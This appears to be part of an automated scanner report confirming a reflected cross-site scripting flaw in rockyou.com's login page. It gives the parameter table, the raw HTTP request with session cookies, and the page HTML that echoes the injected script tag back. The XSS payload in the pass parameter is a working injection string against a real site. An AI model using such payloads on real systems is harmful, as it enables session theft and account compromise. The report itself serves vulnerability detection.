<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'\"--></style></script><script>netsparker(0x000BD3)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'\"--></style></script><script>netsparker(0x000BD3)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| birthyear | GET | 3 |
| country | GET | 0 |
| flixster | GET | 3 |
| mode | GET | create |
| pass | GET | 3 |
| postalcode | GET | 3 |
| sex | GET | 3 |
| source | GET | 3 |
| toscheck | GET | 1 |
| user | GET | 3 |
| user | POST | 3 |
| mode | POST | login |
| pass | POST | '"--></style></script><script>alert(0x000CAC)</script> |
Request
POST /login.php?birthyear=3&country=0&flixster=3&mode=create&pass=3&postalcode=3&sex=3&source=3&toscheck=1&user=3 HTTP/1.1
Referer: http://www.rockyou.com/login.php?birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164293; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 108
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user=3&mode=login&pass='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000CAC)%3c%2fscript%3e
Referer: http://www.rockyou.com/login.php?birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164293; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 108
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user=3&mode=login&pass='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000CAC)%3c%2fscript%3e
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:04:54 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:04:54 GMT; path=/; domain=.rockyou.com,lastlogin=1303164294; expires=Wed, 27-Jul-2011 22:04:54 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:04:54 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=92045 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9117
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\'\"--></style></script><script>netsparker(0x000CAC)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option ..
Date: Mon, 18 Apr 2011 22:04:54 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:04:54 GMT; path=/; domain=.rockyou.com,lastlogin=1303164294; expires=Wed, 27-Jul-2011 22:04:54 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:04:54 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=92045 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9117
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { 